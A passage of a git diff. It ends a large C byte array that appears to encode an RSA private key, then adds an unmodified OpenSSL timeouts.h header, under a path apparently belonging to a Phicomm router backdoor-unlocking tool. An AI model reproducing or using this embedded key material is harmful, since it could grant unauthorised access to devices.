+    0x3b, 0x51, 0x57, 0x71, 0x8d, 0xb6, 0x2b, 0x82, 0x65, 0x21,
+    0x53, 0x5f, 0x28, 0x29, 0x4f, 0x8d, 0x7c, 0x8a, 0xb9, 0x44,
+    0xb3, 0x28, 0x41, 0x4f, 0xd3, 0xfa, 0x6a, 0xf8, 0xb9, 0x28,
+    0x50, 0x39, 0x67, 0x53, 0x2c, 0x3c, 0xd7, 0xcb, 0x96, 0x41,
+    0x40, 0x32, 0xbb, 0xeb, 0x70, 0xae, 0x1f, 0xb0, 0x65, 0xf7,
+    0x3a, 0xd9, 0x22, 0xfd, 0x10, 0xae, 0xbd, 0x02, 0xe2, 0xdd,
+    0xf3, 0xc2, 0x79, 0x3c, 0xc6, 0xfc, 0x75, 0xbb, 0xaf, 0x4e,
+    0x3a, 0x36, 0xc2, 0x4f, 0xea, 0x25, 0xdf, 0x13, 0x16, 0x4b,
+    0x20, 0xfe, 0x4b, 0x69, 0x16, 0xc4, 0x7f, 0x1a, 0x43, 0xa6,
+    0x17, 0x1b, 0xb9, 0x0a, 0xf3, 0x09, 0x86, 0x28, 0x89, 0xcf,
+    0x2c, 0xd0, 0xd4, 0x81, 0xaf, 0xc6, 0x6d, 0xe6, 0x21, 0x8d,
+    0xee, 0xef, 0xea, 0xdc, 0xb7, 0xc6, 0x3b, 0x63, 0x9f, 0x0e,
+    0xad, 0x89, 0x78, 0x23, 0x18, 0xbf, 0x70, 0x7e, 0x84, 0xe0,
+    0x37, 0xec, 0xdb, 0x8e, 0x9c, 0x3e, 0x6a, 0x19, 0xcc, 0x99,
+    0x72, 0xe6, 0xb5, 0x7d, 0x6d, 0xfa, 0xe5, 0xd3, 0xe4, 0x90,
+    0xb5, 0xb2, 0xb2, 0x12, 0x70, 0x4e, 0xca, 0xf8, 0x10, 0xf8,
+    0xa3, 0x14, 0xc2, 0x48, 0x19, 0xeb, 0x60, 0x99, 0xbb, 0x2a,
+    0x1f, 0xb1, 0x7a, 0xb1, 0x3d, 0x24, 0xfb, 0xa0, 0x29, 0xda,
+    0xbd, 0x1b, 0xd7, 0xa4, 0xbf, 0xef, 0x60, 0x2d, 0x22, 0xca,
+    0x65, 0x98, 0xf1, 0xc4, 0xe1, 0xc9, 0x02, 0x6b, 0x16, 0x28,
+    0x2f, 0xa1, 0xaa, 0x79, 0x00, 0xda, 0xdc, 0x7c, 0x43, 0xf7,
+    0x42, 0x3c, 0xa0, 0xef, 0x68, 0xf7, 0xdf, 0xb9, 0x69, 0xfb,
+    0x8e, 0x01, 0xed, 0x01, 0x42, 0xb5, 0x4e, 0x57, 0xa6, 0x26,
+    0xb8, 0xd0, 0x7b, 0x56, 0x6d, 0x03, 0xc6, 0x40, 0x8c, 0x8c,
+    0x2a, 0x55, 0xd7, 0x9c, 0x35, 0x00, 0x94, 0x93, 0xec, 0x03,
+    0xeb, 0x22, 0xef, 0x77, 0xbb, 0x79, 0x13, 0x3f, 0x15, 0xa1,
+    0x8f, 0xca, 0xdf, 0xfd, 0xd3, 0xb8, 0xe1, 0xd4, 0xcc, 0x09,
+    0x3f, 0x3c, 0x2c, 0xdb, 0xd1, 0x49, 0x7f, 0x38, 0x07, 0x83,
+    0x6d, 0xeb, 0x08, 0x66, 0xe9, 0x06, 0x44, 0x12, 0xac, 0x95,
+    0x22, 0x90, 0x23, 0x67, 0xd4, 0x08, 0xcc, 0xf4, 0xb7, 0xdc,
+    0xcc, 0x87, 0xd4, 0xac, 0x69, 0x35, 0x4c, 0xb5, 0x39, 0x36,
+    0xcd, 0xa4, 0xd2, 0x95, 0xca, 0x0d, 0xc5, 0xda, 0xc2, 0xc5,
+    0x22, 0x32, 0x28, 0x08, 0xe3, 0xd2, 0x8b, 0x38, 0x30, 0xdc,
+    0x8c, 0x75, 0x4f, 0x6a, 0xec, 0x7a, 0xac, 0x16, 0x3e, 0xa8,
+    0xd4, 0x6a, 0x45, 0xe1, 0xa8, 0x4f, 0x2e, 0x80, 0x34, 0xaa,
+    0x54, 0x1b, 0x02, 0x95, 0x7d, 0x8a, 0x6d, 0xcc, 0x79, 0xca,
+    0xf2, 0xa4, 0x2e, 0x8d, 0xfb, 0xfe, 0x15, 0x51, 0x10, 0x0e,
+    0x4d, 0x88, 0xb1, 0xc7, 0xf4, 0x79, 0xdb, 0xf0, 0xb4, 0x56,
+    0x44, 0x37, 0xca, 0x5a, 0xc1, 0x8c, 0x48, 0xac, 0xae, 0x48,
+    0x80, 0x83, 0x01, 0x3f, 0xde, 0xd9, 0xd3, 0x2c, 0x51, 0x46,
+    0xb1, 0x41, 0xb6, 0xc6, 0x91, 0x72, 0xf9, 0x83, 0x55, 0x1b,
+    0x8c, 0xba, 0xf3, 0x73, 0xe5, 0x2c, 0x74, 0x50, 0x3a, 0xbe,
+    0xc5, 0x2f, 0xa7, 0xb2, 0x6d, 0x8c, 0x9e, 0x13, 0x77, 0xa3,
+    0x13, 0xcd, 0x6d, 0x8c, 0x45, 0xe1, 0xfc, 0x0b, 0xb7, 0x69,
+    0xe9, 0x27, 0xbc, 0x65, 0xc3, 0xfa, 0x9b, 0xd0, 0xef, 0xfe,
+    0xe8, 0x1f, 0xb3, 0x5e, 0x34, 0xf4, 0x8c, 0xea, 0xfc, 0xd3,
+    0x81, 0xbf, 0x3d, 0x30, 0xb2, 0xb4, 0x01, 0xe8, 0x43, 0x0f,
+    0xba, 0x02, 0x23, 0x42, 0x76, 0x82, 0x31, 0x73, 0x91, 0xed,
+    0x07, 0x46, 0x61, 0x0d, 0x39, 0x83, 0x40, 0xce, 0x7a, 0xd4,
+    0xdb, 0x80, 0x2c, 0x1f, 0x0d, 0xd1, 0x34, 0xd4, 0x92, 0xe3,
+    0xd4, 0xf1, 0xc2, 0x01, 0x02, 0x03, 0x01, 0x00, 0x01, 0x02,
+    0x82, 0x02, 0x01, 0x00, 0x97, 0x6c, 0xda, 0x6e, 0xea, 0x4f,
+    0xcf, 0xaf, 0xf7, 0x4c, 0xd9, 0xf1, 0x90, 0x00, 0x77, 0xdb,
+    0xf2, 0x97, 0x76, 0x72, 0xb9, 0xb7, 0x47, 0xd1, 0x9c, 0xdd,
+    0xcb, 0x4a, 0x33, 0x6e, 0xc9, 0x75, 0x76, 0xe6, 0xe4, 0xa5,
+    0x31, 0x8c, 0x77, 0x13, 0xb4, 0x29, 0xcd, 0xf5, 0x52, 0x17,
+    0xef, 0xf3, 0x08, 0x00, 0xe3, 0xbd, 0x2e, 0xbc, 0xd4, 0x52,
+    0x88, 0xe9, 0x30, 0x75, 0x0b, 0x02, 0xf5, 0xcd, 0x89, 0x0c,
+    0x6c, 0x57, 0x19, 0x27, 0x3d, 0x1e, 0x85, 0xb4, 0xc1, 0x2f,
+    0x1d, 0x92, 0x00, 0x5c, 0x76, 0x29, 0x4b, 0xa4, 0xe1, 0x12,
+    0xb3, 0xc8, 0x09, 0xfe, 0x0e, 0x78, 0x72, 0x61, 0xcb, 0x61,
+    0x6f, 0x39, 0x91, 0x95, 0x4e, 0xd5, 0x3e, 0xc7, 0x8f, 0xb8,
+    0xf6, 0x36, 0xfe, 0x9c, 0x93, 0x9a, 0x38, 0x25, 0x7a, 0xf4,
+    0x4a, 0x12, 0xd4, 0xa0, 0x13, 0xbd, 0xf9, 0x1d, 0x12, 0x3e,
+    0x21, 0x39, 0xfb, 0x72, 0xe0, 0x05, 0x3d, 0xc3, 0xe5, 0x50,
+    0xa8, 0x5d, 0x85, 0xa3, 0xea, 0x5f, 0x1c, 0xb2, 0x3f, 0xea,
+    0x6d, 0x03, 0x91, 0x55, 0xd8, 0x19, 0x0a, 0x21, 0x12, 0x16,
+    0xd9, 0x12, 0xc4, 0xe6, 0x07, 0x18, 0x5b, 0x26, 0xa4, 0xae,
+    0xed, 0x2b, 0xb7, 0xa6, 0xed, 0xf8, 0xad, 0xec, 0x77, 0xe6,
+    0x7f, 0x4f, 0x76, 0x00, 0xc0, 0xfa, 0x15, 0x92, 0xb4, 0x2c,
+    0x22, 0xc2, 0xeb, 0x6a, 0xad, 0x14, 0x05, 0xb2, 0xe5, 0x8a,
+    0x9e, 0x85, 0x83, 0xcc, 0x04, 0xf1, 0x56, 0x78, 0x44, 0x5e,
+    0xde, 0xe0, 0x60, 0x1a, 0x65, 0x79, 0x31, 0x23, 0x05, 0xbb,
+    0x01, 0xff, 0xdd, 0x2e, 0xb7, 0xb3, 0xaa, 0x74, 0xe0, 0xa5,
+    0x94, 0xaf, 0x4b, 0xde, 0x58, 0x0f, 0x55, 0xde, 0x33, 0xf6,
+    0xe3, 0xd6, 0x34, 0x36, 0x57, 0xd6, 0x79, 0x91, 0x2e, 0xbe,
+    0x3b, 0xd9, 0x4e, 0xb6, 0x9d, 0x21, 0x5c, 0xd3, 0x48, 0x14,
+    0x7f, 0x4a, 0xc4, 0x60, 0xa9, 0x29, 0xf8, 0x53, 0x7f, 0x88,
+    0x11, 0x2d, 0xb5, 0xc5, 0x2d, 0x6f, 0xee, 0x85, 0x0b, 0xf7,
+    0x8d, 0x9a, 0xbe, 0xb0, 0x42, 0xf2, 0x2e, 0x71, 0xaf, 0x19,
+    0x31, 0x6d, 0xec, 0xcd, 0x6f, 0x2b, 0x23, 0xdf, 0xb4, 0x40,
+    0xaf, 0x2c, 0x0a, 0xc3, 0x1b, 0x7d, 0x7d, 0x03, 0x1d, 0x4b,
+    0xf3, 0xb5, 0xe0, 0x85, 0xd8, 0xdf, 0x91, 0x6b, 0x0a, 0x69,
+    0xf7, 0xf2, 0x69, 0x66, 0x5b, 0xf1, 0xcf, 0x46, 0x7d, 0xe9,
+    0x70, 0xfa, 0x6d, 0x7e, 0x75, 0x4e, 0xa9, 0x77, 0xe6, 0x8c,
+    0x02, 0xf7, 0x14, 0x4d, 0xa5, 0x41, 0x8f, 0x3f, 0xc1, 0x62,
+    0x1e, 0x71, 0x5e, 0x38, 0xb4, 0xd6, 0xe6, 0xe1, 0x4b, 0xc2,
+    0x2c, 0x30, 0x83, 0x81, 0x6f, 0x49, 0x2e, 0x96, 0xe6, 0xc9,
+    0x9a, 0xf7, 0x5d, 0x09, 0xa0, 0x55, 0x02, 0xa5, 0x3a, 0x25,
+    0x23, 0xd0, 0x92, 0xc3, 0xa3, 0xe3, 0x0e, 0x12, 0x2f, 0x4d,
+    0xef, 0xf3, 0x55, 0x5a, 0xbe, 0xe6, 0x19, 0x86, 0x31, 0xab,
+    0x75, 0x9a, 0xd3, 0xf0, 0x2c, 0xc5, 0x41, 0x92, 0xd9, 0x1f,
+    0x5f, 0x11, 0x8c, 0x75, 0x1c, 0x63, 0xd0, 0x02, 0x80, 0x2c,
+    0x68, 0xcb, 0x93, 0xfb, 0x51, 0x73, 0x49, 0xb4, 0x60, 0xda,
+    0xe2, 0x26, 0xaf, 0xa9, 0x46, 0x12, 0xb8, 0xec, 0x50, 0xdd,
+    0x12, 0x06, 0x5f, 0xce, 0x59, 0xe6, 0xf6, 0x1c, 0xe0, 0x54,
+    0x10, 0xad, 0xf6, 0xcd, 0x98, 0xcc, 0x0f, 0xfb, 0xcb, 0x41,
+    0x14, 0x9d, 0xed, 0xe4, 0xb4, 0x74, 0x5f, 0x09, 0x60, 0xc7,
+    0x12, 0xf6, 0x7b, 0x3c, 0x8f, 0xa7, 0x20, 0xbc, 0xe4, 0xb1,
+    0xef, 0xeb, 0xa4, 0x93, 0xc5, 0x06, 0xca, 0x9a, 0x27, 0x9d,
+    0x87, 0xf3, 0xde, 0xca, 0xe5, 0xe7, 0xf6, 0x1c, 0x01, 0x65,
+    0x5b, 0xfb, 0x19, 0x79, 0x6e, 0x08, 0x26, 0xc5, 0xc8, 0x28,
+    0x0e, 0xb6, 0x3b, 0x07, 0x08, 0xc1, 0x02, 0x82, 0x01, 0x01,
+    0x00, 0xe8, 0x1c, 0x73, 0xa6, 0xb8, 0xe0, 0x0e, 0x6d, 0x8d,
+    0x1b, 0xb9, 0x53, 0xed, 0x58, 0x94, 0xe6, 0x1d, 0x60, 0x14,
+    0x5c, 0x76, 0x43, 0xc4, 0x58, 0x19, 0xc4, 0x24, 0xe8, 0xbc,
+    0x1b, 0x3b, 0x0b, 0x13, 0x24, 0x45, 0x54, 0x0e, 0xcc, 0x37,
+    0xf0, 0xe0, 0x63, 0x7d, 0xc3, 0xf7, 0xfb, 0x81, 0x74, 0x81,
+    0xc4, 0x0f, 0x1a, 0x21, 0x48, 0xaf, 0xce, 0xc1, 0xc4, 0x94,
+    0x18, 0x06, 0x44, 0x8d, 0xd3, 0xd2, 0x22, 0x2d, 0x2d, 0x3e,
+    0x5a, 0x31, 0xdc, 0x95, 0x8e, 0xf4, 0x41, 0xfc, 0x58, 0xc9,
+    0x40, 0x92, 0x17, 0x5f, 0xe3, 0xda, 0xac, 0x9e, 0x3f, 0x1c,
+    0x2a, 0x6b, 0x58, 0x5f, 0x48, 0x78, 0x20, 0xb1, 0xaf, 0x24,
+    0x9b, 0x3c, 0x20, 0x8b, 0x93, 0x25, 0x9e, 0xe6, 0x6b, 0xbc,
+    0x13, 0x42, 0x14, 0x6c, 0x36, 0x31, 0xff, 0x7a, 0xd1, 0xc1,
+    0x1a, 0x26, 0x14, 0x7f, 0xa9, 0x76, 0xa7, 0x0c, 0xf8, 0xcc,
+    0xed, 0x07, 0x6a, 0xd2, 0xdf, 0x62, 0xee, 0x0a, 0x7c, 0x84,
+    0xcb, 0x49, 0x90, 0xb2, 0x03, 0x0d, 0xa2, 0x82, 0x06, 0x77,
+    0xf1, 0xcd, 0x67, 0xf2, 0x47, 0x21, 0x02, 0x3f, 0x43, 0x21,
+    0xf0, 0x46, 0x30, 0x62, 0x51, 0x72, 0xb1, 0xe7, 0x48, 0xc6,
+    0x67, 0x12, 0xcd, 0x9e, 0xd6, 0x15, 0xe5, 0x21, 0xed, 0xfa,
+    0x8f, 0x30, 0xa6, 0x41, 0xfe, 0xb6, 0xfa, 0x8f, 0x34, 0x14,
+    0x19, 0xe8, 0x11, 0xf7, 0xa5, 0x77, 0x3e, 0xb7, 0xf9, 0x39,
+    0x07, 0x8c, 0x67, 0x2a, 0xab, 0x7b, 0x08, 0xf8, 0xb0, 0x06,
+    0xa8, 0xea, 0x2f, 0x8f, 0xfa, 0xcc, 0xcc, 0x40, 0xce, 0xf3,
+    0x70, 0x4f, 0x3f, 0x7f, 0xe2, 0x0c, 0xea, 0x76, 0x4a, 0x35,
+    0x4e, 0x47, 0xad, 0x2b, 0xa7, 0x97, 0x5d, 0x74, 0x43, 0x97,
+    0x90, 0xd2, 0xfb, 0xd9, 0xf9, 0x96, 0x01, 0x33, 0x05, 0xed,
+    0x7b, 0x03, 0x05, 0xad, 0xf8, 0x49, 0x03, 0x02, 0x82, 0x01,
+    0x01, 0x00, 0xd4, 0x40, 0x17, 0x66, 0x10, 0x92, 0x95, 0xc8,
+    0xec, 0x62, 0xa9, 0x7a, 0xcb, 0x93, 0x8e, 0xe6, 0x53, 0xd4,
+    0x80, 0x48, 0x27, 0x4b, 0x41, 0xce, 0x61, 0xdf, 0xbf, 0x94,
+    0xa4, 0x3d, 0x71, 0x03, 0x0b, 0xed, 0x25, 0x71, 0x98, 0xa4,
+    0xd6, 0xd5, 0x4a, 0x57, 0xf5, 0x6c, 0x1b, 0xda, 0x21, 0x7d,
+    0x35, 0x45, 0xb3, 0xf3, 0x6a, 0xd9, 0xd3, 0x43, 0xe8, 0x5c,
+    0x54, 0x1c, 0x83, 0x1b, 0xb4, 0x5f, 0xf2, 0x97, 0x24, 0x2e,
+    0xdc, 0x40, 0xde, 0x92, 0x23, 0x59, 0x8e, 0xbc, 0xd2, 0xa1,
+    0xf2, 0xe0, 0x4c, 0xdd, 0x0b, 0xd1, 0xe7, 0xae, 0x65, 0xbc,
+    0xb5, 0xf5, 0x5b, 0x98, 0xe9, 0xd7, 0xc2, 0xb7, 0x0e, 0x55,
+    0x71, 0x0e, 0x3c, 0x0a, 0x24, 0x6b, 0xa6, 0xe6, 0x14, 0x61,
+    0x11, 0xfd, 0x33, 0x42, 0x99, 0x2b, 0x84, 0x77, 0x74, 0x92,
+    0x91, 0xf5, 0x79, 0x79, 0xcf, 0xad, 0x8e, 0x04, 0xef, 0x80,
+    0x1e, 0x57, 0xf4, 0x14, 0xf5, 0x35, 0x09, 0x74, 0xb2, 0x13,
+    0x71, 0x58, 0x6b, 0xea, 0x32, 0x5d, 0xf3, 0xd3, 0x76, 0x48,
+    0x39, 0x10, 0x23, 0x84, 0x9d, 0xbe, 0x92, 0x77, 0x4a, 0xed,
+    0x70, 0x3e, 0x1a, 0xa2, 0x6c, 0xb3, 0x81, 0x00, 0xc3, 0xc9,
+    0xe4, 0x52, 0xc8, 0x24, 0x88, 0x0c, 0x41, 0xad, 0x87, 0x5a,
+    0xea, 0xa3, 0x7a, 0x85, 0x1c, 0x5e, 0x31, 0x7f, 0xc3, 0x35,
+    0xc6, 0xfa, 0x10, 0xc8, 0x75, 0x10, 0xc4, 0x96, 0x99, 0xe7,
+    0xfe, 0x01, 0xb4, 0x74, 0xdb, 0xb4, 0x11, 0xc3, 0xc8, 0x8c,
+    0xf6, 0xf7, 0x3b, 0x66, 0x50, 0xfc, 0xdb, 0xeb, 0xca, 0x47,
+    0x85, 0x89, 0xe1, 0x65, 0xd9, 0x62, 0x34, 0x3c, 0x70, 0xd8,
+    0x2e, 0xb4, 0x2f, 0x65, 0x3c, 0x4a, 0xa6, 0x2a, 0xe7, 0xc7,
+    0xd8, 0x41, 0x8f, 0x8a, 0x43, 0xbf, 0x42, 0xf2, 0x4d, 0xbc,
+    0xfc, 0x9e, 0x27, 0x95, 0xfb, 0x75, 0xff, 0xab, 0x02, 0x82,
+    0x01, 0x00, 0x41, 0x2f, 0x44, 0x57, 0x6d, 0x12, 0x17, 0x5b,
+    0x32, 0xc6, 0xb7, 0x6c, 0x57, 0x7a, 0x8a, 0x0e, 0x79, 0xef,
+    0x72, 0xa8, 0x68, 0xda, 0x2d, 0x38, 0xe4, 0xbb, 0x8d, 0xf6,
+    0x02, 0x65, 0xcf, 0x56, 0x13, 0xe1, 0x1a, 0xcb, 0x39, 0x80,
+    0xa6, 0xb1, 0x32, 0x03, 0x1e, 0xdd, 0xbb, 0x35, 0xd9, 0xac,
+    0x43, 0x89, 0x31, 0x08, 0x90, 0x92, 0x5e, 0x35, 0x3d, 0x7b,
+    0x9c, 0x6f, 0x86, 0xcb, 0x17, 0xdd, 0x85, 0xe4, 0xed, 0x35,
+    0x08, 0x8e, 0xc1, 0xf4, 0x05, 0xd8, 0x68, 0xc6, 0x63, 0x3c,
+    0xf7, 0xff, 0xf7, 0x47, 0x33, 0x39, 0xc5, 0x3e, 0xb7, 0x0e,
+    0x58, 0x35, 0x9d, 0x81, 0xea, 0xf8, 0x6a, 0x2c, 0x1c, 0x5a,
+    0x68, 0x78, 0x64, 0x11, 0x6b, 0xc1, 0x3e, 0x4e, 0x7a, 0xbd,
+    0x84, 0xcb, 0x0f, 0xc2, 0xb6, 0x85, 0x1d, 0xd3, 0x76, 0xc5,
+    0x93, 0x6a, 0x69, 0x89, 0x56, 0x34, 0xdc, 0x4a, 0x9b, 0xbc,
+    0xff, 0xa8, 0x0d, 0x6e, 0x35, 0x9c, 0x60, 0xa7, 0x23, 0x30,
+    0xc7, 0x06, 0x64, 0x39, 0x8b, 0x94, 0x89, 0xee, 0xba, 0x7f,
+    0x60, 0x8d, 0xfa, 0xb6, 0x97, 0x76, 0xdc, 0x51, 0x4a, 0x3c,
+    0xeb, 0x3a, 0x14, 0x2c, 0x20, 0x60, 0x69, 0x4a, 0x86, 0xfe,
+    0x8c, 0x21, 0x84, 0x49, 0x54, 0xb3, 0x20, 0xe1, 0x01, 0x7f,
+    0x58, 0xdf, 0x7f, 0xb5, 0x21, 0x51, 0x8c, 0x47, 0x9f, 0x91,
+    0xeb, 0x97, 0x3e, 0xf2, 0x54, 0xcf, 0x16, 0x46, 0xf9, 0xd9,
+    0xb6, 0xe7, 0x64, 0xc9, 0xd0, 0x54, 0xea, 0x2f, 0xa1, 0xcf,
+    0xa5, 0x7f, 0x28, 0x8d, 0x84, 0xec, 0xd5, 0x39, 0x03, 0x76,
+    0x5b, 0x2d, 0x8e, 0x43, 0xf2, 0x01, 0x24, 0xc9, 0x6f, 0xc0,
+    0xf5, 0x69, 0x6f, 0x7d, 0xb5, 0x85, 0xd2, 0x5f, 0x7f, 0x78,
+    0x40, 0x07, 0x7f, 0x09, 0x15, 0xb5, 0x1f, 0x28, 0x65, 0x10,
+    0xe4, 0x19, 0xa8, 0xc6, 0x9e, 0x8d, 0xdc, 0xcb, 0x02, 0x82,
+    0x01, 0x00, 0x13, 0x01, 0xee, 0x56, 0x80, 0x93, 0x70, 0x00,
+    0x7f, 0x52, 0xd2, 0x94, 0xa1, 0x98, 0x84, 0x4a, 0x92, 0x25,
+    0x4c, 0x9b, 0xa9, 0x91, 0x2e, 0xc2, 0x79, 0xb7, 0x5c, 0xe3,
+    0xc5, 0xd5, 0x8e, 0xc2, 0x54, 0x16, 0x17, 0xad, 0x55, 0x9b,
+    0x25, 0x76, 0x12, 0x63, 0x50, 0x22, 0x2f, 0x58, 0x58, 0x79,
+    0x6b, 0x04, 0xe3, 0xf9, 0x9f, 0x8f, 0x04, 0x41, 0x67, 0x94,
+    0xa5, 0x1f, 0xac, 0x8a, 0x15, 0x9c, 0x26, 0x10, 0x6c, 0xf8,
+    0x19, 0x57, 0x61, 0xd7, 0x3a, 0x7d, 0x31, 0xb0, 0x2d, 0x38,
+    0xbd, 0x94, 0x62, 0xad, 0xc4, 0xfa, 0x36, 0x42, 0x42, 0xf0,
+    0x24, 0x67, 0x65, 0x9d, 0x8b, 0x0b, 0x7c, 0x6f, 0x82, 0x44,
+    0x1a, 0x8c, 0xc8, 0xc9, 0xab, 0xbb, 0x4c, 0x45, 0xfc, 0x7b,
+    0x38, 0xee, 0x30, 0xe1, 0xfc, 0xef, 0x8d, 0xbc, 0x58, 0xdf,
+    0x2b, 0x5d, 0x0d, 0x54, 0xe0, 0x49, 0x4d, 0x97, 0x99, 0x8f,
+    0x22, 0xa8, 0x83, 0xbe, 0x40, 0xbb, 0x50, 0x2e, 0x78, 0x28,
+    0x0f, 0x95, 0x78, 0x8c, 0x8f, 0x98, 0x24, 0x56, 0xc2, 0x97,
+    0xf3, 0x2c, 0x43, 0xd2, 0x03, 0x82, 0x66, 0x81, 0x72, 0x5f,
+    0x53, 0x16, 0xec, 0xb1, 0xb1, 0x04, 0x5e, 0x40, 0x20, 0x48,
+    0x7b, 0x3f, 0x02, 0x97, 0x6a, 0xeb, 0x96, 0x12, 0x21, 0x35,
+    0xfe, 0x1f, 0x47, 0xc0, 0x95, 0xea, 0xc5, 0x8a, 0x08, 0x84,
+    0x4f, 0x5e, 0x63, 0x94, 0x60, 0x0f, 0x71, 0x5b, 0x7f, 0x4a,
+    0xec, 0x4f, 0x60, 0xc6, 0xba, 0x4a, 0x24, 0xf1, 0x20, 0x8b,
+    0xa7, 0x2e, 0x3a, 0xce, 0x8d, 0xe0, 0x27, 0x1d, 0xb5, 0x8e,
+    0xb4, 0x21, 0xc5, 0xe2, 0xa6, 0x16, 0x0a, 0x51, 0x83, 0x55,
+    0x88, 0xd1, 0x30, 0x11, 0x63, 0xd5, 0xd7, 0x8d, 0xae, 0x16,
+    0x12, 0x82, 0xc4, 0x85, 0x00, 0x4e, 0x27, 0x83, 0xa5, 0x7c,
+    0x90, 0x2e, 0xe5, 0xa2, 0xa3, 0xd3, 0x4c, 0x63, 0x02, 0x82,
+    0x01, 0x01, 0x00, 0x86, 0x08, 0x98, 0x98, 0xa5, 0x00, 0x05,
+    0x39, 0x77, 0xd9, 0x66, 0xb3, 0xcf, 0xca, 0xa0, 0x71, 0xb3,
+    0x50, 0xce, 0x3d, 0xb1, 0x93, 0x95, 0x35, 0xc4, 0xd4, 0x2e,
+    0x90, 0xdf, 0x0f, 0xfc, 0x60, 0xc1, 0x94, 0x68, 0x61, 0x43,
+    0xca, 0x9a, 0x23, 0x4a, 0x1e, 0x45, 0x72, 0x99, 0xb5, 0x1e,
+    0x61, 0x8d, 0x77, 0x0f, 0xa0, 0xbb, 0xd7, 0x77, 0xb4, 0x2a,
+    0x15, 0x11, 0x88, 0x2d, 0xb3, 0x56, 0x61, 0x5e, 0x6a, 0xed,
+    0xa4, 0x46, 0x4a, 0x3f, 0x50, 0x11, 0xd6, 0xba, 0xb6, 0xd7,
+    0x95, 0x65, 0x53, 0xc3, 0xa1, 0x8f, 0xe0, 0xa3, 0xf5, 0x1c,
+    0xfd, 0xaf, 0x6e, 0x43, 0xd7, 0x17, 0xa7, 0xd3, 0x81, 0x1b,
+    0xa4, 0xdf, 0xe0, 0x97, 0x8a, 0x46, 0x03, 0xd3, 0x46, 0x0e,
+    0x83, 0x48, 0x4e, 0xd2, 0x02, 0xcb, 0xc0, 0xad, 0x79, 0x95,
+    0x8c, 0x96, 0xba, 0x40, 0x34, 0x11, 0x71, 0x5e, 0xe9, 0x11,
+    0xf9, 0xc5, 0x4a, 0x5e, 0x91, 0x9d, 0xf5, 0x92, 0x4f, 0xeb,
+    0xc6, 0x70, 0x02, 0x2d, 0x3d, 0x04, 0xaa, 0xe9, 0x3a, 0x8e,
+    0xd5, 0xa8, 0xad, 0xf7, 0xce, 0x0d, 0x16, 0xb2, 0xec, 0x0a,
+    0x9c, 0xf5, 0x94, 0x39, 0xb9, 0x8a, 0xfc, 0x1e, 0xf9, 0xcc,
+    0xf2, 0x5f, 0x21, 0x31, 0x74, 0x72, 0x6b, 0x64, 0xae, 0x35,
+    0x61, 0x8d, 0x0d, 0xcb, 0xe7, 0xda, 0x39, 0xca, 0xf3, 0x21,
+    0x66, 0x0b, 0x95, 0xd7, 0x0a, 0x7c, 0xca, 0xa1, 0xa9, 0x5a,
+    0xe8, 0xac, 0xe0, 0x71, 0x54, 0xaf, 0x28, 0xcf, 0xd5, 0x70,
+    0x89, 0xe0, 0xf3, 0x9e, 0x43, 0x6c, 0x8d, 0x7b, 0x99, 0x01,
+    0x68, 0x4d, 0xa1, 0x45, 0x46, 0x0c, 0x43, 0xbc, 0xcc, 0x2c,
+    0xdd, 0xc5, 0x46, 0xc8, 0x4e, 0x0e, 0xbe, 0xed, 0xb9, 0x26,
+    0xab, 0x2e, 0xdb, 0xeb, 0x8f, 0xff, 0xdb, 0xb0, 0xc6, 0x55,
+    0xaf, 0xf8, 0x2a, 0x91, 0x9d, 0x50, 0x44, 0x21, 0x17,
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/timeouts.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/timeouts.h
new file mode 100644
index 0000000..f423010
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/timeouts.h
@@ -0,0 +1,67 @@
+/* apps/timeouts.h */
+/*
+ * DTLS implementation written by Nagendra Modadugu
+ * (nagendra@cs.stanford.edu) for the OpenSSL project 2005.
+ */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef INCLUDED_TIMEOUTS_H
+# define INCLUDED_TIMEOUTS_H
+
+/* numbers in us */
+# define DGRAM_RCV_TIMEOUT         250000
+# define DGRAM_SND_TIMEOUT         250000
